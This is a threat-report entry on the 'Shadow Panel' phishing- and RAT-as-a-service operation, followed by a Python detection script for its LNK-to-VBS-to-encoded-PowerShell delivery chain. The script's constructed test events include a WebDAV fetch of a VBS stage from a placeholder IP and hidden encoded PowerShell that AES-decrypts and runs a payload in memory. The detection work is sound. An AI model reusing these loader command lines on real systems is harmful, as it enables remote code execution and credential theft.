REFUNDEE: Inside a Shadow Panel Phishing-as-a-Service Operation
Essential information
- Published
- 13/04/2026 17:06
- Modified
- 13/04/2026 15:48
- Source / Author
- AlienVault
- Confidence
- 100/100
- Report type(s)
- threat-report
- Labels / Tags
- bulgarian-infrastructure cryptocurrency-theft phishing-as-a-service powershell rat-as-a-service refundee shadow panel shadow-panel spanish-portuguese-targeting webdav
- Tags
- 2026-04-13 bulgarian-infrastructure cryptocurrency theft phishing-as-a-service powershell rat-as-a-service refundee shadow panel spanish-portuguese-targeting webdav
- Related entities
- 25 indicators, 25 observables, 20 techniques (mitre), 2 malware, 8 others
Description
An open-directory discovery at refundonex[.]com exposed a complete Phishing-as-a-Service and RAT-as-a-Service platform targeting Spanish- and Portuguese-speaking victims. The investigation uncovered 3,788 files, including weaponized LNK and VBS files and AES-encrypted PowerShell payloads that deliver a remote access trojan. The platform, called Shadow Panel, operates from Bulgarian infrastructure and offers remote shell execution, screenshot capture, file management, browser credential theft, clipboard hijacking that swaps cryptocurrency wallet addresses, and multi-operator support. The C2 panel's frontend JavaScript was publicly accessible, revealing 29 API endpoints and the complete architecture. Infrastructure analysis linked the operation to nikola4010@proton[.]me through WHOIS data and historical malicious domain associations dating back to 2021, indicating a long-running cybercriminal operation with minimal detection coverage.
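The delivery chain the description summarizes (a weaponized LNK, a VBS stage, then AES-encrypted PowerShell that is decrypted and run in memory, with a webdav tag on the report) lends itself to a process-ancestry hunt rather than a hash match, since the payloads themselves are rebuilt per campaign. The following is an added example, not code from the report or from AlienVault: a Python triage pass over constructed Sysmon-style process-creation events that flags a script host reading its payload from a WebDAV UNC path, PowerShell spawned by that script host, and an encoded command that decodes to an AES decrypt-and-IEX stage. The events, the address 203.0.113.10, the file names and the stage-2 script are made up to illustrate the pattern; WebDAV as the LNK's fetch path is an assumption taken from the report's tag, not a detail the summary states.

```python
"""Added example (not from the report): hunting the LNK -> VBS -> encoded
AES-decrypting PowerShell chain over constructed process-creation events."""
import base64
import re
from dataclasses import dataclass
from typing import Dict, List, Optional


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full path of the executable
    cmdline: str    # full command line as logged


@dataclass
class Finding:
    rule: str
    pid: int
    detail: str


SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}

# UNC path with an @port/@SSL host suffix, or the DavWWWRoot share name, both
# of which mean the Mini-Redirector is fetching the file over WebDAV.
WEBDAV_RE = re.compile(r"\\\\[\w.-]+@(?:\d+|ssl)\\|davwwwroot", re.IGNORECASE)
# -EncodedCommand and every unambiguous abbreviation PowerShell accepts.
ENC_RE = re.compile(r"(?:^|\s)-(?:encodedcommand|enc|en|ec|e)\s+([A-Za-z0-9+/=]+)",
                    re.IGNORECASE)
# .NET AES usage plus an in-memory execution primitive inside the decoded script.
AES_RE = re.compile(r"Cryptography\.Aes|AesManaged|AesCryptoServiceProvider|"
                    r"CreateDecryptor|TransformFinalBlock", re.IGNORECASE)
EXEC_RE = re.compile(r"\bIEX\b|Invoke-Expression", re.IGNORECASE)


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the UTF-16LE script behind -EncodedCommand, or None if absent/invalid."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(1), validate=True)
    except ValueError:          # binascii.Error is a ValueError subclass
        return None
    return raw.decode("utf-16-le", errors="replace")


def hunt(events: List[ProcEvent]) -> List[Finding]:
    by_pid: Dict[int, ProcEvent] = {e.pid: e for e in events}
    findings: List[Finding] = []
    for e in events:
        name = basename(e.image)
        parent = by_pid.get(e.ppid)
        pname = basename(parent.image) if parent else ""
        if name in SCRIPT_HOSTS and WEBDAV_RE.search(e.cmdline):
            findings.append(Finding("script_host_webdav_payload", e.pid, e.cmdline))
        if name in POWERSHELL and pname in SCRIPT_HOSTS:
            findings.append(Finding("powershell_spawned_by_script_host", e.pid,
                                    f"parent {pname} (pid {e.ppid})"))
        if name in POWERSHELL:
            script = decode_encoded_command(e.cmdline)
            if script and AES_RE.search(script) and EXEC_RE.search(script):
                findings.append(Finding("encoded_aes_stage_in_memory", e.pid, script[:120]))
    return findings


# Constructed stage-2 stand-in: decrypts a blob with .NET AES and IEXes the result.
SAMPLE_STAGE2 = (
    "$k=[Convert]::FromBase64String('a2V5a2V5a2V5a2V5a2V5a2V5a2V5a2V5a2V5a2V5');"
    "$a=[System.Security.Cryptography.Aes]::Create();$a.Key=$k;$a.IV=$iv;"
    "$d=$a.CreateDecryptor();"
    "IEX([Text.Encoding]::UTF8.GetString($d.TransformFinalBlock($c,0,$c.Length)))"
)
SAMPLE_ENC = base64.b64encode(SAMPLE_STAGE2.encode("utf-16-le")).decode()
BENIGN_ENC = base64.b64encode("Get-Process | Select-Object Name".encode("utf-16-le")).decode()

# Constructed events (not from the report). 203.0.113.10 is a documentation address.
SAMPLE_EVENTS = [
    ProcEvent(1000, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    # the .lnk target: a script host pulling the VBS stage over WebDAV (assumed path)
    ProcEvent(2000, 1000, r"C:\Windows\System32\wscript.exe",
              r'wscript.exe //B //E:vbscript "\\203.0.113.10@80\DavWWWRoot\reembolso\factura.vbs"'),
    # the VBS stage launching hidden, policy-bypassing, encoded PowerShell
    ProcEvent(3000, 2000, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              f"powershell.exe -NoP -W Hidden -Ep Bypass -Enc {SAMPLE_ENC}"),
    # benign noise: an encoded command from explorer with no AES or IEX inside
    ProcEvent(4000, 1000, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              f"powershell.exe -EncodedCommand {BENIGN_ENC}"),
]

if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"[{f.rule}] pid={f.pid}: {f.detail}")
```

Each rule fires on a different layer of the chain, so a benign encoded command (pid 4000 above) produces nothing while the three findings on pids 2000 and 3000 together describe the whole intrusion path. In a real deployment the same checks map onto Sysmon Event ID 1 fields (Image, ParentImage, CommandLine), and the decoded script is worth keeping in the alert because the AES key and ciphertext in it are what an analyst needs to recover the RAT stage.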